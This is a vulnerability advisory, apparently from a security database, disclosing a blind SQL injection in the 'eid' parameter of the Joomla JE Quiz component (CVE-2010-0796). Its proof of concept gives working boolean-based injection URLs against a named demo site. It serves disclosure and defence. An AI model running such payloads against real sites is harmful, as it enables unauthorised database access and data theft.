Bug: Joomla (JE Quiz component 1.0) BLIND SQL Injection Vulnerability (WLB-2010030158 Ascii Version)

English Version
WLB2

CVE WLB2

 Topic: Joomla (JE Quiz component 1.0) BLIND SQL Injection Vulnerability
 Credit: B-HUNT3|2
 Date: 2010.03.04
 CWE: CWE-89 (Show similar)
 CVE: CVE-2010-0796 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
High
No
Yes

[~]>> ...[BEGIN ADVISORY]...

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> TITLE: Joomla (JE Quiz component) BLIND SQL Injection Vulnerability
[~]>> LANGUAGE: PHP
[~]>> DORK: N/A
[~]>> RESEARCHER: B-HUNT3|2
[~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com
[~]>> TYPE: COMMERCIAL
[~]>> PRICE: $20.00
[~]>> TESTED ON: Demo Site

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> DESCRIPTION: Input var eid is vulnerable to SQL Code Injection
[~]>> AFFECTED VERSIONS: Confirmed in 1.b01 but probably other versions also
[~]>> RISK: Medium/High
[~]>> IMPACT: Execute Arbitrary SQL queries

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> PROOF OF CONCEPT:

[~]>>
http://demo.joomlaextensions.co.in/index.php?option=com_jequizmanagement&view=question&eid=[SQL]&Itemid=163

[~]>> {RETURN TRUE::RETURN FALSE}

[~]>>
http://demo.joomlaextensions.co.in/index.php?option=com_jequizmanagement&view=question&eid=1+AND+1=if(substring(
@@version,1,1)=5,1,0)&Itemid=163
[~]>>
http://demo.joomlaextensions.co.in/index.php?option=com_jequizmanagement&view=question&eid=1+AND+1=if(substring(
@@version,1,1)=4,1,0)&Itemid=163

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> ...[END ADVISORY]...

References:

http://xforce.iss.net/xforce/xfdb/56009
http://www.securityfocus.com/bid/38032
http://www.exploit-db.com/exploits/11287
http://secunia.com/advisories/38412
http://packetstormsecurity.org/1001-exploits/joomlajequiz-sql.txt
http://osvdb.org/62039

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com